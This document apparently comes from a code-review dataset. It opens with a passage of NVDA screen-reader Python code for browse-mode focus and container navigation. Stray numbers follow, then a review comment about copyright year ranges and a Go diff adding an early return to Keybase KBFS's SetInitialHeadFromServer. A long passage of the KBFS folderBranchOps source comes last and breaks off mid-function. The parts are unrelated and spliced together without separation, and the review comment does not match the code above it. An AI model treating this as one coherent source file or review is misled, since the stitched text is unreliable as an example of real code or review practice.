return if obj==self.rootNVDAObject: if self.passThrough: return nextHandler() return if not self.passThrough and self._shouldIgnoreFocus(obj): return self._lastFocusObj=obj try: focusInfo = self.makeTextInfo(obj) except: # This object is not in the treeInterceptor, even though it resides beneath the document. # Automatic pass through should be enabled in certain circumstances where this occurs. if not self.passThrough and self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS): self.passThrough=True reportPassThrough(self) self._replayFocusEnteredEvents() return nextHandler() #We only want to update the caret and speak the field if we're not in the same one as before caretInfo=self.makeTextInfo(textInfos.POSITION_CARET) # Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping. caretInfo.expand(textInfos.UNIT_CHARACTER) if not self._hadFirstGainFocus or not focusInfo.isOverlapping(caretInfo): # The virtual caret is not within the focus node. oldPassThrough=self.passThrough passThrough=self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS) if not oldPassThrough and (passThrough or sayAllHandler.isRunning()): # If pass-through is disabled, cancel speech, as a focus change should cause page reading to stop. # This must be done before auto-pass-through occurs, as we want to stop page reading even if pass-through will be automatically enabled by this focus change. speech.cancelSpeech() self.passThrough=passThrough if not self.passThrough: # We read the info from the browseMode document instead of the control itself. speech.speakTextInfo(focusInfo,reason=controlTypes.REASON_FOCUS) # However, we still want to update the speech property cache so that property changes will be spoken properly. 
speech.speakObject(obj,controlTypes.REASON_ONLYCACHE) else: if not oldPassThrough: self._replayFocusEnteredEvents() nextHandler() focusInfo.collapse() self._set_selection(focusInfo,reason=controlTypes.REASON_FOCUS) else: # The virtual caret was already at the focused node. if not self.passThrough: # This focus change was caused by a virtual caret movement, so don't speak the focused node to avoid double speaking. # However, we still want to update the speech property cache so that property changes will be spoken properly. speech.speakObject(obj,controlTypes.REASON_ONLYCACHE) else: return nextHandler() self._postGainFocus(obj) event_gainFocus.ignoreIsReady=True def _handleScrollTo(self, obj): """Handle scrolling the browseMode document to a given object in response to an event. Subclasses should call this from an event which indicates that the document has scrolled. @postcondition: The virtual caret is moved to L{obj} and the buffer content for L{obj} is reported. @param obj: The object to which the document should scroll. @type obj: L{NVDAObjects.NVDAObject} @return: C{True} if the document was scrolled, C{False} if not. @rtype: bool @note: If C{False} is returned, calling events should probably call their nextHandler. """ if self.programmaticScrollMayFireEvent and self._lastProgrammaticScrollTime and time.time() - self._lastProgrammaticScrollTime < 0.4: # This event was probably caused by this browseMode document's call to scrollIntoView(). # Therefore, ignore it. Otherwise, the cursor may bounce back to the scroll point. # However, pretend we handled it, as we don't want it to be passed on to the object either. return True try: scrollInfo = self.makeTextInfo(obj) except: return False #We only want to update the caret and speak the field if we're not in the same one as before caretInfo=self.makeTextInfo(textInfos.POSITION_CARET) # Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping. 
caretInfo.expand(textInfos.UNIT_CHARACTER) if not scrollInfo.isOverlapping(caretInfo): if scrollInfo.isCollapsed: scrollInfo.expand(textInfos.UNIT_LINE) speech.speakTextInfo(scrollInfo,reason=controlTypes.REASON_CARET) scrollInfo.collapse() self.selection = scrollInfo return True return False APPLICATION_ROLES = (controlTypes.ROLE_APPLICATION, controlTypes.ROLE_DIALOG) def _isNVDAObjectInApplication(self, obj): """Determine whether a given object is within an application. The object is considered to be within an application if it or one of its ancestors has an application role. This should only be called on objects beneath the treeInterceptor's root NVDAObject. @param obj: The object in question. @type obj: L{NVDAObjects.NVDAObject} @return: C{True} if L{obj} is within an application, C{False} otherwise. @rtype: bool """ # We cache the result for each object we walk. # There can be browse mode documents within other documents and the result might be different between these, # so the cache must be maintained on the TreeInterceptor rather than the object itself. try: cache = self._isInAppCache except AttributeError: # Create this lazily, as this method isn't used by all browse mode implementations. cache = self._isInAppCache = weakref.WeakKeyDictionary() objs = [] def doResult(result): # Cache this on descendants we've walked over. for obj in objs: cache[obj] = result return result while obj and obj != self.rootNVDAObject: inApp = cache.get(obj) if inApp is not None: # We found a cached result. return doResult(inApp) objs.append(obj) if obj.role in self.APPLICATION_ROLES: return doResult(True) # Cache container. container = obj.container obj.container = container obj = container return doResult(False) def _get_documentConstantIdentifier(self): """Get the constant identifier for this document. This identifier should uniquely identify all instances (not just one instance) of a document for at least the current session of the hosting application. 
Generally, the document URL should be used. @return: The constant identifier for this document, C{None} if there is none. """ return None def _get_shouldRememberCaretPositionAcrossLoads(self): """Specifies whether the position of the caret should be remembered when this document is loaded again. This is useful when the browser remembers the scroll position for the document, but does not communicate this information via APIs. The remembered caret position is associated with this document using L{documentConstantIdentifier}. @return: C{True} if the caret position should be remembered, C{False} if not. @rtype: bool """ docConstId = self.documentConstantIdentifier # Return True if the URL indicates that this is probably a web browser document. # We do this check because we don't want to remember caret positions for email messages, etc. return isinstance(docConstId, basestring) and docConstId.split("://", 1)[0] in ("http", "https", "ftp", "ftps", "file") def _getInitialCaretPos(self): """Retrieve the initial position of the caret after the buffer has been loaded. This position, if any, will be passed to L{makeTextInfo}. Subclasses should extend this method. @return: The initial position of the caret, C{None} if there isn't one. @rtype: TextInfo position """ if self.shouldRememberCaretPositionAcrossLoads: try: return self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier] except KeyError: pass return None def getEnclosingContainerRange(self,range): range=range.copy() range.collapse() try: item = next(self._iterNodesByType("container", "up", range)) except (NotImplementedError,StopIteration): return return item.textInfo def script_moveToStartOfContainer(self,gesture): info=self.makeTextInfo(textInfos.POSITION_CARET) info.expand(textInfos.UNIT_CHARACTER) container=self.getEnclosingContainerRange(info) if not container: # Translators: Reported when the user attempts to move to the start or end of a container (list, table, etc.) 
# But there is no container. ui.message(_("Not in a container")) return container.collapse() self._set_selection(container, reason=REASON_QUICKNAV) if not willSayAllResume(gesture): container.expand(textInfos.UNIT_LINE) speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS) script_moveToStartOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET # Translators: Description for the Move to start of container command in browse mode. script_moveToStartOfContainer.__doc__=_("Moves to the start of the container element, such as a list or table") def script_movePastEndOfContainer(self,gesture): info=self.makeTextInfo(textInfos.POSITION_CARET) info.expand(textInfos.UNIT_CHARACTER) container=self.getEnclosingContainerRange(info) if not container: ui.message(_("Not in a container")) return container.collapse(end=True) docEnd=container.obj.makeTextInfo(textInfos.POSITION_LAST) if container.compareEndPoints(docEnd,"endToEnd")>=0: container=docEnd # Translators: a message reported when: # Review cursor is at the bottom line of the current navigator object. # Landing at the end of a browse mode document when trying to jump to the end of the current container. ui.message(_("bottom")) self._set_selection(container, reason=REASON_QUICKNAV) if not willSayAllResume(gesture): container.expand(textInfos.UNIT_LINE) speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS) script_movePastEndOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET # Translators: Description for the Move past end of container command in browse mode. script_movePastEndOfContainer.__doc__=_("Moves past the end of the container element, such as a list or table") NOT_LINK_BLOCK_MIN_LEN = 30 def _isSuitableNotLinkBlock(self,range): return len(range.text)>=self.NOT_LINK_BLOCK_MIN_LEN def _iterNotLinkBlock(self, direction="next", pos=None): links = self._iterNodesByType("link", direction=direction, pos=pos) # We want to compare each link against the next link. 
item1 = next(links) while True: item2 = next(links) # If the distance between the links is small, this is probably just a piece of non-link text within a block of links; e.g. an inactive link of a nav bar. if direction=="previous": range=item1.textInfo.copy() range.collapse() range.setEndPoint(item2.textInfo,"startToEnd") else: range=item2.textInfo.copy() range.collapse() range.setEndPoint(item1.textInfo,"startToEnd") if self._isSuitableNotLinkBlock(range): yield TextInfoQuickNavItem("notLinkBlock",self,range) item1=item2 __gestures={ "kb:NVDA+d": "activateLongDesc", "kb:escape": "disablePassThrough", "kb:alt+upArrow": "collapseOrExpandControl", "kb:alt+downArrow": "collapseOrExpandControl", "kb:tab": "tab", "kb:shift+tab": "shiftTab", "kb:shift+,": "moveToStartOfContainer", "kb:,": "movePastEndOfContainer", }
1
17,676
When updating the copyright, we tend to cover previous years, not just the current. So, if we started the file in 2015, we'd update to say 2015-2016. I'm not sure if there's a legal requirement surrounding this, but it's the convention we and many others have adopted for code.
nvaccess-nvda
py
@@ -1180,6 +1180,16 @@ func (fbo *folderBranchOps) SetInitialHeadFromServer( return fmt.Errorf("MD with revision=%d not initialized", md.Revision()) } + // Return early if the head is already set. This avoids taking + // mdWriterLock for no reason. + lState := makeFBOLockState() + head := fbo.getHead(lState) + if head != (ImmutableRootMetadata{}) && head.mdID == md.mdID { + fbo.log.CDebugf(ctx, "Head MD already set to revision %d (%s), no "+ + "need to set initial head again", md.Revision(), md.MergedStatus()) + return nil + } + return runUnlessCanceled(ctx, func() error { fb := FolderBranch{md.TlfID(), MasterBranch} if fb != fbo.folderBranch {
1
// Copyright 2016 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import ( "errors" "fmt" "os" "reflect" "strings" "sync" "time" "github.com/keybase/backoff" "github.com/keybase/client/go/logger" "github.com/keybase/client/go/protocol/keybase1" "golang.org/x/net/context" ) // mdReqType indicates whether an operation makes MD modifications or not type mdReqType int const ( // A read request that doesn't need an identify to be // performed. mdReadNoIdentify mdReqType = iota // A read request that needs an identify to be performed (if // it hasn't been already). mdReadNeedIdentify // A write request. mdWrite // A rekey request. Doesn't need an identify to be performed, as // a rekey does its own (finer-grained) identifies. mdRekey ) type branchType int const ( standard branchType = iota // an online, read-write branch archive // an online, read-only branch offline // an offline, read-write branch archiveOffline // an offline, read-only branch ) // Constants used in this file. TODO: Make these configurable? const ( // MaxBlockSizeBytesDefault is the default maximum block size for KBFS. // 512K blocks by default, block changes embedded max == 8K. // Block size was chosen somewhat arbitrarily by trying to // minimize the overall size of the history written by a user when // appending 1KB writes to a file, up to a 1GB total file. 
Here // is the output of a simple script that approximates that // calculation: // // Total history size for 0065536-byte blocks: 1134341128192 bytes // Total history size for 0131072-byte blocks: 618945052672 bytes // Total history size for 0262144-byte blocks: 412786622464 bytes // Total history size for 0524288-byte blocks: 412786622464 bytes // Total history size for 1048576-byte blocks: 618945052672 bytes // Total history size for 2097152-byte blocks: 1134341128192 bytes // Total history size for 4194304-byte blocks: 2216672886784 bytes MaxBlockSizeBytesDefault = 512 << 10 // Maximum number of blocks that can be sent in parallel maxParallelBlockPuts = 100 // Max response size for a single DynamoDB query is 1MB. maxMDsAtATime = 10 // Time between checks for dirty files to flush, in case Sync is // never called. secondsBetweenBackgroundFlushes = 10 // Cap the number of times we retry after a recoverable error maxRetriesOnRecoverableErrors = 10 // When the number of dirty bytes exceeds this level, force a sync. dirtyBytesThreshold = maxParallelBlockPuts * MaxBlockSizeBytesDefault // The timeout for any background task. backgroundTaskTimeout = 1 * time.Minute ) type fboMutexLevel mutexLevel const ( fboMDWriter fboMutexLevel = 1 fboHead = 2 fboBlock = 3 ) func (o fboMutexLevel) String() string { switch o { case fboMDWriter: return "mdWriterLock" case fboHead: return "headLock" case fboBlock: return "blockLock" default: return fmt.Sprintf("Invalid fboMutexLevel %d", int(o)) } } func fboMutexLevelToString(o mutexLevel) string { return (fboMutexLevel(o)).String() } // Rules for working with lockState in FBO: // // - Every "execution flow" (i.e., program flow that happens // sequentially) needs its own lockState object. This usually means // that each "public" FBO method does: // // lState := makeFBOLockState() // // near the top. // // - Plumb lState through to all functions that hold any of the // relevant locks, or are called under those locks. 
// // This way, violations of the lock hierarchy will be detected at // runtime. func makeFBOLockState() *lockState { return makeLevelState(fboMutexLevelToString) } // blockLock is just like a sync.RWMutex, but with an extra operation // (DoRUnlockedIfPossible). type blockLock struct { leveledRWMutex locked bool } func (bl *blockLock) Lock(lState *lockState) { bl.leveledRWMutex.Lock(lState) bl.locked = true } func (bl *blockLock) Unlock(lState *lockState) { bl.locked = false bl.leveledRWMutex.Unlock(lState) } // DoRUnlockedIfPossible must be called when r- or w-locked. If // r-locked, r-unlocks, runs the given function, and r-locks after // it's done. Otherwise, just runs the given function. func (bl *blockLock) DoRUnlockedIfPossible(lState *lockState, f func(*lockState)) { if !bl.locked { bl.RUnlock(lState) defer bl.RLock(lState) } f(lState) } // folderBranchOps implements the KBFSOps interface for a specific // branch of a specific folder. It is go-routine safe for operations // within the folder. // // We use locks to protect against multiple goroutines accessing the // same folder-branch. The goal with our locking strategy is maximize // concurrent access whenever possible. See design/state_machine.md // for more details. There are three important locks: // // 1) mdWriterLock: Any "remote-sync" operation (one which modifies the // folder's metadata) must take this lock during the entirety of // its operation, to avoid forking the MD. // // 2) headLock: This is a read/write mutex. It must be taken for // reading before accessing any part of the current head MD. It // should be taken for the shortest time possible -- that means in // general that it should be taken, and the MD copied to a // goroutine-local variable, and then it can be released. 
// Remote-sync operations should take it for writing after pushing // all of the blocks and MD to the KBFS servers (i.e., all network // accesses), and then hold it until after all notifications have // been fired, to ensure that no concurrent "local" operations ever // see inconsistent state locally. // // 3) blockLock: This too is a read/write mutex. It must be taken for // reading before accessing any blocks in the block cache that // belong to this folder/branch. This includes checking their // dirty status. It should be taken for the shortest time possible // -- that means in general it should be taken, and then the blocks // that will be modified should be copied to local variables in the // goroutine, and then it should be released. The blocks should // then be modified locally, and then readied and pushed out // remotely. Only after the blocks have been pushed to the server // should a remote-sync operation take the lock again (this time // for writing) and put/finalize the blocks. Write and Truncate // should take blockLock for their entire lifetime, since they // don't involve writes over the network. Furthermore, if a block // is not in the cache and needs to be fetched, we should release // the mutex before doing the network operation, and lock it again // before writing the block back to the cache. // // We want to allow writes and truncates to a file that's currently // being sync'd, like any good networked file system. The tricky part // is making sure the changes can both: a) be read while the sync is // happening, and b) be applied to the new file path after the sync is // done. // // For now, we just do the dumb, brute force thing for now: if a block // is currently being sync'd, it copies the block and puts it back // into the cache as modified. 
Then, when the sync finishes, it // throws away the modified blocks and re-applies the change to the // new file path (which might have a completely different set of // blocks, so we can't just reuse the blocks that were modified during // the sync.) type folderBranchOps struct { config Config folderBranch FolderBranch bid BranchID // protected by mdWriterLock bType branchType observers *observerList // these locks, when locked concurrently by the same goroutine, // should only be taken in the following order to avoid deadlock: mdWriterLock leveledMutex // taken by any method making MD modifications // protects access to head and latestMergedRevision. headLock leveledRWMutex head ImmutableRootMetadata // latestMergedRevision tracks the latest heard merged revision on server latestMergedRevision MetadataRevision blocks folderBlockOps // nodeCache itself is goroutine-safe, but this object's use // of it has special requirements: // // - Reads can call PathFromNode() unlocked, since there are // no guarantees with concurrent reads. // // - Operations that takes mdWriterLock always needs the // most up-to-date paths, so those must call // PathFromNode() under mdWriterLock. // // - Block write operations (write/truncate/sync) need to // coordinate. Specifically, sync must make sure that // blocks referenced in a path (including all of the child // blocks) must exist in the cache during calls to // PathFromNode from write/truncate. This means that sync // must modify dirty file blocks only under blockLock, and // write/truncate must call PathFromNode() under // blockLock. // // Furthermore, calls to UpdatePointer() must happen // before the copy-on-write mode induced by Sync() is // finished. nodeCache NodeCache // Whether we've identified this TLF or not. 
identifyLock sync.Mutex identifyDone bool identifyTime time.Time // The current status summary for this folder status *folderBranchStatusKeeper // How to log log logger.Logger deferLog logger.Logger // Closed on shutdown shutdownChan chan struct{} // Can be used to turn off notifications for a while (e.g., for testing) updatePauseChan chan (<-chan struct{}) // After a shutdown, this channel will be closed when the register // goroutine completes. updateDoneChan chan struct{} // forceSyncChan is read from by the background sync process // to know when it should sync immediately. forceSyncChan <-chan struct{} // How to resolve conflicts cr *ConflictResolver // Helper class for archiving and cleaning up the blocks for this TLF fbm *folderBlockManager // rekeyWithPromptTimer tracks a timed function that will try to // rekey with a paper key prompt, if enough time has passed. // Protected by mdWriterLock rekeyWithPromptTimer *time.Timer editHistory *TlfEditHistory mdFlushes RepeatedWaitGroup } var _ KBFSOps = (*folderBranchOps)(nil) var _ fbmHelper = (*folderBranchOps)(nil) // newFolderBranchOps constructs a new folderBranchOps object. func newFolderBranchOps(config Config, fb FolderBranch, bType branchType) *folderBranchOps { nodeCache := newNodeCacheStandard(fb) // make logger branchSuffix := "" if fb.Branch != MasterBranch { branchSuffix = " " + string(fb.Branch) } tlfStringFull := fb.Tlf.String() // Shorten the TLF ID for the module name. 8 characters should be // unique enough for a local node. log := config.MakeLogger(fmt.Sprintf("FBO %s%s", tlfStringFull[:8], branchSuffix)) // But print it out once in full, just in case. 
log.CInfof(nil, "Created new folder-branch for %s", tlfStringFull) observers := newObserverList() mdWriterLock := makeLeveledMutex(mutexLevel(fboMDWriter), &sync.Mutex{}) headLock := makeLeveledRWMutex(mutexLevel(fboHead), &sync.RWMutex{}) blockLockMu := makeLeveledRWMutex(mutexLevel(fboBlock), &sync.RWMutex{}) forceSyncChan := make(chan struct{}) fbo := &folderBranchOps{ config: config, folderBranch: fb, bid: BranchID{}, bType: bType, observers: observers, status: newFolderBranchStatusKeeper(config, nodeCache), mdWriterLock: mdWriterLock, headLock: headLock, blocks: folderBlockOps{ config: config, log: log, folderBranch: fb, observers: observers, forceSyncChan: forceSyncChan, blockLock: blockLock{ leveledRWMutex: blockLockMu, }, dirtyFiles: make(map[BlockPointer]*dirtyFile), unrefCache: make(map[blockRef]*syncInfo), deCache: make(map[blockRef]DirEntry), nodeCache: nodeCache, }, nodeCache: nodeCache, log: log, deferLog: log.CloneWithAddedDepth(1), shutdownChan: make(chan struct{}), updatePauseChan: make(chan (<-chan struct{})), forceSyncChan: forceSyncChan, } fbo.cr = NewConflictResolver(config, fbo) fbo.fbm = newFolderBlockManager(config, fb, fbo) fbo.editHistory = NewTlfEditHistory(config, fbo, log) if config.DoBackgroundFlushes() { go fbo.backgroundFlusher(secondsBetweenBackgroundFlushes * time.Second) } return fbo } // markForReIdentifyIfNeeded checks whether this tlf is identified and mark // it for lazy reidentification if it exceeds time limits. func (fbo *folderBranchOps) markForReIdentifyIfNeeded(now time.Time, maxValid time.Duration) { fbo.identifyLock.Lock() defer fbo.identifyLock.Unlock() if fbo.identifyDone && (now.Before(fbo.identifyTime) || fbo.identifyTime.Add(maxValid).Before(now)) { fbo.log.CDebugf(nil, "Expiring identify from %v", fbo.identifyTime) fbo.identifyDone = false } } // Shutdown safely shuts down any background goroutines that may have // been launched by folderBranchOps. 
func (fbo *folderBranchOps) Shutdown() error { if fbo.config.CheckStateOnShutdown() { ctx := context.TODO() lState := makeFBOLockState() if fbo.blocks.GetState(lState) == dirtyState { fbo.log.CDebugf(ctx, "Skipping state-checking due to dirty state") } else if !fbo.isMasterBranch(lState) { fbo.log.CDebugf(ctx, "Skipping state-checking due to being staged") } else { // Make sure we're up to date first if err := fbo.SyncFromServerForTesting(ctx, fbo.folderBranch); err != nil { return err } // Check the state for consistency before shutting down. sc := NewStateChecker(fbo.config) if err := sc.CheckMergedState(ctx, fbo.id()); err != nil { return err } } } close(fbo.shutdownChan) fbo.cr.Shutdown() fbo.fbm.shutdown() fbo.editHistory.Shutdown() // Wait for the update goroutine to finish, so that we don't have // any races with logging during test reporting. if fbo.updateDoneChan != nil { <-fbo.updateDoneChan } return nil } func (fbo *folderBranchOps) id() TlfID { return fbo.folderBranch.Tlf } func (fbo *folderBranchOps) branch() BranchName { return fbo.folderBranch.Branch } func (fbo *folderBranchOps) GetFavorites(ctx context.Context) ( []Favorite, error) { return nil, errors.New("GetFavorites is not supported by folderBranchOps") } func (fbo *folderBranchOps) RefreshCachedFavorites(ctx context.Context) { // no-op } func (fbo *folderBranchOps) DeleteFavorite(ctx context.Context, fav Favorite) error { return errors.New("DeleteFavorite is not supported by folderBranchOps") } func (fbo *folderBranchOps) AddFavorite(ctx context.Context, fav Favorite) error { return errors.New("AddFavorite is not supported by folderBranchOps") } func (fbo *folderBranchOps) addToFavorites(ctx context.Context, favorites *Favorites, created bool) (err error) { lState := makeFBOLockState() head := fbo.getHead(lState) if head == (ImmutableRootMetadata{}) { return OpsCantHandleFavorite{"Can't add a favorite without a handle"} } return fbo.addToFavoritesByHandle(ctx, favorites, head.GetTlfHandle(), 
created) } func (fbo *folderBranchOps) addToFavoritesByHandle(ctx context.Context, favorites *Favorites, handle *TlfHandle, created bool) (err error) { if _, _, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx); err != nil { // Can't favorite while not logged in return nil } favorites.AddAsync(ctx, handle.toFavToAdd(created)) return nil } func (fbo *folderBranchOps) deleteFromFavorites(ctx context.Context, favorites *Favorites) error { if _, _, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx); err != nil { // Can't unfavorite while not logged in return nil } lState := makeFBOLockState() head := fbo.getHead(lState) if head == (ImmutableRootMetadata{}) { // This can happen when identifies fail and the head is never set. return OpsCantHandleFavorite{"Can't delete a favorite without a handle"} } h := head.GetTlfHandle() return favorites.Delete(ctx, h.ToFavorite()) } func (fbo *folderBranchOps) getHead(lState *lockState) ImmutableRootMetadata { fbo.headLock.RLock(lState) defer fbo.headLock.RUnlock(lState) return fbo.head } // isMasterBranch should not be called if mdWriterLock is already taken. 
func (fbo *folderBranchOps) isMasterBranch(lState *lockState) bool { fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.bid == NullBranchID } func (fbo *folderBranchOps) isMasterBranchLocked(lState *lockState) bool { fbo.mdWriterLock.AssertLocked(lState) return fbo.bid == NullBranchID } func (fbo *folderBranchOps) setBranchIDLocked(lState *lockState, bid BranchID) { fbo.mdWriterLock.AssertLocked(lState) fbo.bid = bid if bid == NullBranchID { fbo.status.setCRSummary(nil, nil) } } func (fbo *folderBranchOps) checkDataVersion(p path, ptr BlockPointer) error { if ptr.DataVer < FirstValidDataVer { return InvalidDataVersionError{ptr.DataVer} } // TODO: migrate back to fbo.config.DataVersion if ptr.DataVer > FilesWithHolesDataVer { return NewDataVersionError{p, ptr.DataVer} } return nil } func (fbo *folderBranchOps) setHeadLocked( ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) isFirstHead := fbo.head == ImmutableRootMetadata{} wasReadable := false if !isFirstHead { wasReadable = fbo.head.IsReadable() if fbo.head.mdID == md.mdID { panic(fmt.Errorf("Re-putting the same MD: %s", md.mdID)) } } fbo.log.CDebugf(ctx, "Setting head revision to %d", md.Revision()) err := fbo.config.MDCache().Put(md) if err != nil { return err } // If this is the first time the MD is being set, and we are // operating on unmerged data, initialize the state properly and // kick off conflict resolution. if isFirstHead && md.MergedStatus() == Unmerged { fbo.setBranchIDLocked(lState, md.BID()) // Use uninitialized for the merged branch; the unmerged // revision is enough to trigger conflict resolution. fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized) } else if md.MergedStatus() == Merged { // If we are already merged through this write, the revision would be the // latestMergedRevision on server. 
fbo.setLatestMergedRevisionLocked(ctx, lState, md.Revision(), false) } // Make sure that any unembedded block changes have been swapped // back in. if md.data.Changes.Info.BlockPointer != zeroPtr && len(md.data.Changes.Ops) == 0 { return errors.New("Must swap in block changes before setting head") } fbo.head = md fbo.status.setRootMetadata(md) if isFirstHead { // Start registering for updates right away, using this MD // as a starting point. For now only the master branch can // get updates if fbo.branch() == MasterBranch { fbo.updateDoneChan = make(chan struct{}) go fbo.registerAndWaitForUpdates() } } if !wasReadable && md.IsReadable() { // Let any listeners know that this folder is now readable, // which may indicate that a rekey successfully took place. fbo.config.Reporter().Notify(ctx, mdReadSuccessNotification( md.GetTlfHandle(), md.TlfID().IsPublic())) } return nil } // setInitialHeadUntrustedLocked is for when the given RootMetadata // was fetched not due to a user action, i.e. via a Rekey // notification, and we don't have a TLF name to check against. func (fbo *folderBranchOps) setInitialHeadUntrustedLocked(ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) if fbo.head != (ImmutableRootMetadata{}) { return errors.New("Unexpected non-nil head in setInitialHeadUntrustedLocked") } return fbo.setHeadLocked(ctx, lState, md) } // setNewInitialHeadLocked is for when we're creating a brand-new TLF. 
func (fbo *folderBranchOps) setNewInitialHeadLocked(ctx context.Context,
	lState *lockState, md ImmutableRootMetadata) error {
	fbo.mdWriterLock.AssertLocked(lState)
	fbo.headLock.AssertLocked(lState)
	if fbo.head != (ImmutableRootMetadata{}) {
		return errors.New("Unexpected non-nil head in setNewInitialHeadLocked")
	}
	// A brand-new TLF must start at the initial revision.
	if md.Revision() != MetadataRevisionInitial {
		return fmt.Errorf("setNewInitialHeadLocked unexpectedly called with revision %d", md.Revision())
	}
	return fbo.setHeadLocked(ctx, lState, md)
}

// setInitialHeadTrustedLocked is for when the given RootMetadata
// was fetched due to a user action, and will be checked against the
// TLF name.
func (fbo *folderBranchOps) setInitialHeadTrustedLocked(ctx context.Context,
	lState *lockState, md ImmutableRootMetadata) error {
	fbo.mdWriterLock.AssertLocked(lState)
	fbo.headLock.AssertLocked(lState)
	if fbo.head != (ImmutableRootMetadata{}) {
		return errors.New("Unexpected non-nil head in setInitialHeadUntrustedLocked")
	}
	return fbo.setHeadLocked(ctx, lState, md)
}

// setHeadSuccessorLocked is for when we're applying updates from the
// server or when we're applying new updates we created ourselves.
func (fbo *folderBranchOps) setHeadSuccessorLocked(ctx context.Context,
	lState *lockState, md ImmutableRootMetadata, rebased bool) error {
	fbo.mdWriterLock.AssertLocked(lState)
	fbo.headLock.AssertLocked(lState)
	if fbo.head == (ImmutableRootMetadata{}) {
		// This can happen in tests via SyncFromServerForTesting().
		return fbo.setInitialHeadTrustedLocked(ctx, lState, md)
	}

	if !rebased {
		// Unless the caller rebased md onto a new parent, it must be
		// a valid successor of the current head.
		err := fbo.head.CheckValidSuccessor(fbo.head.mdID, md.ReadOnly())
		if err != nil {
			return err
		}
	}

	oldHandle := fbo.head.GetTlfHandle()
	newHandle := md.GetTlfHandle()

	// Newer handles should be equal or more resolved over time.
	//
	// TODO: In some cases, they shouldn't, e.g. if we're on an
	// unmerged branch. Add checks for this.
	resolvesTo, partialResolvedOldHandle, err :=
		oldHandle.ResolvesTo(
			ctx, fbo.config.Codec(), fbo.config.KBPKI(),
			*newHandle)
	if err != nil {
		return err
	}

	oldName := oldHandle.GetCanonicalName()
	newName := newHandle.GetCanonicalName()

	if !resolvesTo {
		return IncompatibleHandleError{
			oldName,
			partialResolvedOldHandle.GetCanonicalName(),
			newName,
		}
	}

	err = fbo.setHeadLocked(ctx, lState, md)
	if err != nil {
		return err
	}

	if oldName != newName {
		fbo.log.CDebugf(ctx, "Handle changed (%s -> %s)",
			oldName, newName)

		// If the handle has changed, send out a notification.
		fbo.observers.tlfHandleChange(ctx, fbo.head.GetTlfHandle())
		// Also the folder should be re-identified given the
		// newly-resolved assertions.
		func() {
			fbo.identifyLock.Lock()
			defer fbo.identifyLock.Unlock()
			fbo.identifyDone = false
		}()
	}

	return nil
}

// setHeadPredecessorLocked is for when we're unstaging updates.
func (fbo *folderBranchOps) setHeadPredecessorLocked(ctx context.Context,
	lState *lockState, md ImmutableRootMetadata) error {
	fbo.mdWriterLock.AssertLocked(lState)
	fbo.headLock.AssertLocked(lState)
	if fbo.head == (ImmutableRootMetadata{}) {
		return errors.New("Unexpected nil head in setHeadPredecessorLocked")
	}
	if fbo.head.Revision() <= MetadataRevisionInitial {
		return fmt.Errorf("setHeadPredecessorLocked unexpectedly called with revision %d", fbo.head.Revision())
	}
	// Unstaging only makes sense while on an unmerged branch.
	if fbo.head.MergedStatus() != Unmerged {
		return errors.New("Unexpected merged head in setHeadPredecessorLocked")
	}

	// The relationship is inverted here: the current head must be a
	// valid successor of the (older) md we're rolling back to.
	err := md.CheckValidSuccessor(md.mdID, fbo.head.ReadOnly())
	if err != nil {
		return err
	}

	oldHandle := fbo.head.GetTlfHandle()
	newHandle := md.GetTlfHandle()

	// The two handles must be the same, since no rekeying is done
	// while unmerged.
	eq, err := oldHandle.Equals(fbo.config.Codec(), *newHandle)
	if err != nil {
		return err
	}
	if !eq {
		return fmt.Errorf(
			"head handle %v unexpectedly not equal to new handle = %v",
			oldHandle, newHandle)
	}

	return fbo.setHeadLocked(ctx, lState, md)
}

// setHeadConflictResolvedLocked is for when we're setting the merged
// update with resolved conflicts.
func (fbo *folderBranchOps) setHeadConflictResolvedLocked(ctx context.Context,
	lState *lockState, md ImmutableRootMetadata) error {
	fbo.mdWriterLock.AssertLocked(lState)
	fbo.headLock.AssertLocked(lState)
	if fbo.head.MergedStatus() != Unmerged {
		return errors.New("Unexpected merged head in setHeadConflictResolvedLocked")
	}
	if md.MergedStatus() != Merged {
		return errors.New("Unexpected unmerged update in setHeadConflictResolvedLocked")
	}

	return fbo.setHeadLocked(ctx, lState, md)
}

// identifyOnce runs identify on the folder's handle exactly once per
// successful attempt; subsequent calls are no-ops until identifyDone
// is reset.  A failed identify leaves identifyDone unset so the next
// caller retries.
func (fbo *folderBranchOps) identifyOnce(
	ctx context.Context, md ReadOnlyRootMetadata) error {
	fbo.identifyLock.Lock()
	defer fbo.identifyLock.Unlock()
	if fbo.identifyDone {
		return nil
	}

	h := md.GetTlfHandle()
	fbo.log.CDebugf(ctx, "Running identifies on %s", h.GetCanonicalPath())
	kbpki := fbo.config.KBPKI()
	err := identifyHandle(ctx, kbpki, kbpki, h)
	if err != nil {
		fbo.log.CDebugf(ctx, "Identify finished with error: %v", err)
		// For now, if the identify fails, let the
		// next function to hit this code path retry.
		return err
	}

	fbo.log.CDebugf(ctx, "Identify finished successfully")
	fbo.identifyDone = true
	fbo.identifyTime = fbo.config.Clock().Now()
	return nil
}

// getMDLocked returns the current head MD, fetching it from the
// server if it isn't set yet (which is only allowed in mdWrite or
// mdRekey mode).  On success (except for mdReadNoIdentify/mdRekey) it
// also runs identifyOnce via the deferred closure.
//
// if rtype == mdWrite || mdRekey, then mdWriterLock must be taken
func (fbo *folderBranchOps) getMDLocked(
	ctx context.Context, lState *lockState, rtype mdReqType) (
	md ImmutableRootMetadata, err error) {
	defer func() {
